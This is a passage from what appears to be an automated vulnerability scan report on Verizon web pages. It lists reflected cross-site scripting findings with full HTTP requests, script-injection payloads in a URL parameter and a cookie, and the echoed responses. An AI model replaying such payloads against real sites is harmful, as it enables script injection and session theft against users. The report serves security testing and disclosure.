Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:41:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=KKCMJDFBHONCKMJLKPLHPKFD; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Content-Length: 128993



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
mopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?fcc6f";98476cbd401=1';

...[SNIP]...

1.25. https://www22.verizon.com/myverizon/ [goto parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/myverizon/

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5019"%3b15d2ffcfe11 was submitted in the goto parameter. This input was echoed as c5019";15d2ffcfe11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /myverizon/?session=n&goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspxc5019"%3b15d2ffcfe11 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; lob=webmail; amlbcookie=03

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:44 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=PJJGEODCPLFPKBGNAFICECAB; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:44 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129009



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspxc5019";15d2ffcfe11';

...[SNIP]...

1.26. https://www22.verizon.com/myverizon/ [goto parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/myverizon/

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383dc"%3bf834175335c was submitted in the goto parameter. This input was echoed as 383dc";f834175335c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /myverizon/?goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc"%3bf834175335c HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; lob=webmail; amlbcookie=03; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:10 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 129009



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc";f834175335c';

...[SNIP]...

1.27. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab670<script>alert(1)</script>34458ec6bd8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab670<script>alert(1)</script>34458ec6bd8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68152
Expires: Sat, 20 Nov 2010 00:18:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:18:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXab670<script>alert(1)</script>34458ec6bd8; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAB670<SCRIPT>ALERT(1)</SCRIPT>34458EC6BD8 </DIV>
...[SNIP]...

1.28. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cddfb'><script>alert(1)</script>30cb0779e1a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcddfb'><script>alert(1)</script>30cb0779e1a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68156
Expires: Sat, 20 Nov 2010 00:18:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:18:40 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXcddfb'><script>alert(1)</script>30cb0779e1a; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXCDDFB'><SCRIPT>ALERT(1)</SCRIPT>30CB0779E1A ' />
...[SNIP]...

1.29. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b421a'><script>alert(1)</script>297c29e43fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb421a'><script>alert(1)</script>297c29e43fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61767
Expires: Sat, 20 Nov 2010 00:15:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=TXb421a'><script>alert(1)</script>297c29e43fb; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB421A'><SCRIPT>ALERT(1)</SCRIPT>297C29E43FB ' />
...[SNIP]...

1.30. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e00e8<script>alert(1)</script>275bd796ccd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe00e8<script>alert(1)</script>275bd796ccd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61763
Expires: Sat, 20 Nov 2010 00:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=TXe00e8<script>alert(1)</script>275bd796ccd; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE00E8<SCRIPT>ALERT(1)</SCRIPT>275BD796CCD </DIV>
...[SNIP]...

1.31. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50cb2'><script>alert(1)</script>84521e8362 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX50cb2'><script>alert(1)</script>84521e8362; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63787
Expires: Sat, 20 Nov 2010 00:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
